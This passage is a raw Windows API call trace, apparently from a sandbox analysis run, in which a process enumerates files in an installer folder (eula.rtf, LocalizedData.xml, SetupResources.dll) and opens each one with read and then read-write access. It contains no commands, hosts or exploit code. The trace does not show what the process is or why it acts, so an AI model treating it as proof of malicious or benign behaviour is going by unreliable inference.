lpWideCharStr=0x0) returned 36 [0061.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0061.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 36 [0061.365] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.365] GetFileType (hFile=0x41c) returned 0x1 [0061.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.365] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.365] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.365] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.365] CloseHandle (hObject=0x41c) returned 1 [0061.365] AreFileApisANSI () returned 1 [0061.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 36 [0061.366] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.366] GetFileType (hFile=0x41c) returned 0x1 [0061.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.366] CloseHandle (hObject=0x41c) returned 1 [0061.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.367] AreFileApisANSI () returned 1 [0061.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69350 [0061.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 36 [0061.367] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8)) returned 1 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.367] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0061.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0061.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0061.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0061.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.368] AreFileApisANSI () returned 1 [0061.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.368] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0061.368] AreFileApisANSI () returned 1 [0061.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0061.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 45 [0061.369] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.369] GetFileType (hFile=0x41c) returned 0x1 [0061.369] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.369] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.369] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.369] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.369] CloseHandle (hObject=0x41c) returned 1 [0061.370] AreFileApisANSI () returned 1 [0061.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0061.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 45 [0061.370] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.370] GetFileType (hFile=0x41c) returned 0x1 [0061.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0061.370] CloseHandle (hObject=0x41c) returned 1 [0061.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0061.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0061.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.371] AreFileApisANSI () returned 1 [0061.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0061.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 45 [0061.371] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6)) returned 1 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.371] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.371] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.371] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0061.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.372] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.372] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.372] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0061.372] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.372] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0061.372] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.372] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.372] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.372] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.372] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.372] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.372] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.372] AreFileApisANSI () returned 1 [0061.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.372] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.372] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.372] AreFileApisANSI () returned 1 [0061.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.372] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0061.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 46 [0061.373] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.373] GetFileType (hFile=0x41c) returned 0x1 